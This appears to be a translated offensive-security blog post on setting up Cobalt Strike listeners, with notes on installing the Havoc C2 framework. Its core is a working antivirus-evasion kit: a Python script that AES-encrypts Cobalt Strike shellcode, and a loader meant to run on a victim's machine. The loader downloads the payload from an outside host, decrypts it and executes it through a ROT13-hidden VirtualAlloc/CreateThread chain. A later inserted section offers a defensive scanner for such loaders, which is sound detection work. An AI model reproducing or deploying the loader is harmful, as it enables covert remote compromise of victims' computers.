CS usage and Havoc installation

Configure a listener:

  • Configure the listener

    • First set up a listener for the reverse shell

      • # host: the local IP (check with ifconfig)
        # port: the port that will receive the reverse shell
        Http Hosts: local IP
        HTTP HOST(Stager): local IP
        HTTP Port(c2): the port that receives the shell
        

Click Attacks > generate a Python payload --- then use my script below and leave the victim baffled~



### Static AV-evasion payload script and loader (Python)

The Python payload generated by CS (passes the latest 360 and Microsoft antivirus, but is flagged when run~~, just for fun hhh)

```python
import requests, re
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
import base64

# file_path: where the encrypted payload file is written
file_path = './payload.txt'  # replace as needed
# url: download link for the payload file generated on Kali
url = 'http://192.168.175.131/6.py'  # replace as needed
res = requests.get(url).text
# pull the quoted buf = "..." literal out of the generated script
match = re.search(r'buf = (".*?")', res, re.DOTALL)
if match:
    data = match.group(1).replace('"', '').encode()
    key = get_random_bytes(16)
    iv = get_random_bytes(16)
    cipher_encrypt = AES.new(key, AES.MODE_CBC, iv)
    # PKCS#7 padding up to a whole number of 16-byte blocks
    padding_length = 16 - len(data) % 16
    data += bytes([padding_length] * padding_length)
    encrypted_data = cipher_encrypt.encrypt(data)
    # the IV is stored in front of the ciphertext, then the whole thing is base64-encoded
    encoded_payload = base64.b64encode(iv + encrypted_data).decode()
    print('encryption key', key)
    with open(file_path, 'w') as file:
        file.write(encoded_payload)
    print('done')
```

Loader (run on the victim's machine):

```python
import requests, re
import ctypes
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
import base64

# the key printed by the encryptor when payload.txt was generated
key = b'\x07 \xf0\xe1\x9a\xc1\xd5\xd1\xb0\xd0\x8f.9\x8eY\xb2'  # replace
# URL from which the generated payload.txt can be downloaded
url = 'http://192.168.175.131/payload.txt'  # replace
res = requests.get(url).text
decoded_data = base64.b64decode(res.encode())
iv_from_encoded = decoded_data[:16]
encrypted_data_from_encoded = decoded_data[16:]
cipher_decrypt = AES.new(key, AES.MODE_CBC, iv_from_encoded)
decrypted_data = cipher_decrypt.decrypt(encrypted_data_from_encoded)
# strip the PKCS#7 padding added by the encryptor
padding_length = decrypted_data[-1]
decrypted_data = decrypted_data[:-padding_length]
# the recovered text is the escaped "\x.." literal; turn it back into raw bytes
whatfuck2 = bytes(decrypted_data.decode('unicode_escape'), 'latin1')


def Old_Six(passwds):
    # ROT13 over ASCII letters only; every other character passes through unchanged
    Ojbk = ''
    for item in passwds:
        if (ord(item) >= ord('A') and ord(item) <= ord('M')) or (ord(item) >= ord('a') and ord(item) <= ord('m')):
            Ojbk += chr(ord(item) + 13)
        elif (ord(item) >= ord('N') and ord(item) <= ord('Z')) or (ord(item) >= ord('n') and ord(item) <= ord('z')):
            Ojbk += chr(ord(item) - 13)
        else:
            Ojbk += item
    Ojbk_o0Ol = Ojbk.replace('shellcode', 'whatfuck2')
    return Ojbk_o0Ol


what_ssss = "pglcrf.jvaqyy.xreary32.IveghnyNyybp.erfglcr=pglcrf.p_hvag64;ejkcntr = pglcrf.jvaqyy.xreary32.IveghnyNyybp(0, yra(furyypbqr), 0k1000, 0k40);pglcrf.jvaqyy.xreary32.EgyZbirZrzbel(pglcrf.p_hvag64(ejkcntr), pglcrf.perngr_fgevat_ohssre(furyypbqr), yra(furyypbqr));unaqyr = pglcrf.jvaqyy.xreary32.PerngrGuernq(0, 0, pglcrf.p_hvag64(ejkcntr), 0, 0, 0);pglcrf.jvaqyy.xreary32.JnvgSbeFvatyrBowrpg(unaqyr, -1)"
exec(Old_Six(what_ssss))
```
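
From the defender's side, the loader above is easy to spot once you look at it the way the interpreter will: the ROT13 layer is its own inverse, so a single pass with Python's `rot13` codec exposes the Win32 API names, and the `exec(` call is in plain text. The following triage script is an added example, not code from the original post; it scans Python source text for the classic in-process injection markers (`VirtualAlloc`, `RtlMoveMemory`, `CreateThread`, `WaitForSingleObject` and relatives) both as written and after ROT13, and flags a file that combines several of them with `exec(` or an obfuscation layer. The marker list and the scoring rule are my own assumptions, not a vendor signature; the sample input is a constructed fragment built from the same ROT13 tokens the loader uses, and the benign control is constructed too.

```python
import codecs
import re

# Win32 calls that together form the classic in-process shellcode chain
# (allocate executable memory, copy bytes in, start a thread, wait on it).
# Any one of them is ordinary; several in one short script, hidden behind
# a text transform and fed to exec(), is the triage signal.
# ASSUMPTION: this list is illustrative, not a vendor signature.
INJECTION_MARKERS = (
    "ctypes.windll", "VirtualAlloc", "VirtualProtect", "RtlMoveMemory",
    "WriteProcessMemory", "CreateThread", "CreateRemoteThread",
    "WaitForSingleObject",
)


def candidate_layers(text):
    """Yield (layer_name, view) for the source as written and after ROT13.

    ROT13 is its own inverse, so one pass through the 'rot13' codec shows
    what a loader of the kind above reconstructs at run time.
    """
    yield "plain", text
    yield "rot13", codecs.encode(text, "rot13")


def scan_python_source(text):
    """Scan Python source text and return a small triage record.

    apis       -> {marker: layer in which it was first seen}
    exec       -> True if the file calls exec(
    obfuscated -> True if some marker was only visible after ROT13
    suspicious -> two or more markers plus exec() or an obfuscation layer
    """
    apis = {}
    for layer, view in candidate_layers(text):
        for marker in INJECTION_MARKERS:
            if marker in view:
                apis.setdefault(marker, layer)
    uses_exec = re.search(r"\bexec\s*\(", text) is not None
    obfuscated = any(layer != "plain" for layer in apis.values())
    suspicious = len(apis) >= 2 and (uses_exec or obfuscated)
    return {"apis": apis, "exec": uses_exec,
            "obfuscated": obfuscated, "suspicious": suspicious}


# Constructed sample: a short script in the style of the loader above, with the
# API chain ROT13-encoded inside a string literal and run through exec().
SAMPLE_SOURCE = '''import ctypes
blob = "pglcrf.jvaqyy.xreary32.IveghnyNyybp(0, yra(ohs), 0k1000, 0k40);pglcrf.jvaqyy.xreary32.PerngrGuernq(0, 0, 0, 0, 0, 0)"
exec(decode(blob))
'''

# Constructed benign control: ordinary ctypes use with nothing hidden.
BENIGN_SOURCE = '''import ctypes
libc = ctypes.CDLL(None)
print(libc.getpid())
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_SOURCE), ("benign", BENIGN_SOURCE)):
        print(name, scan_python_source(src))
```

The scan is deliberately layered rather than signature-only: a single API name in plain text is normal for a ctypes script, so the verdict needs the combination (several markers, plus either dynamic execution or a decoding layer). Adding further cheap transforms to `candidate_layers` (base64, hex) extends it to other string-hiding tricks without touching the scoring.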

Havoc installation

Project page: https://github.com/HavocFramework/Havoc

Installing on Kali

Proxy tool: mihomo (best to go through a proxy)

Usage guide: https://fanqiang.gitbook.io/fanqiang/linux

Installation guide: https://github.com/HavocFramework/Havoc/blob/main/WIKI.MD

```bash
# install the Go environment
apt install golang -y
```

Installing on Windows

https://www.cnblogs.com/bktown/p/18314327/compile-havoc-under-windows-z25dynx

Environment:

https://github.com/msys2/msys2-installer/releases/download/2024-07-27/msys2-x86_64-20240727.exe

Check the cmake environment

```bash
pacman -Qs cmake
```

Add the environment variable

```bash
export PATH="/c/msys64/mingw64/bin:$PATH"
```

Reload the environment

```bash
source ~/.bashrc
```

Verify the installation

```bash
cmake --version
```

havoc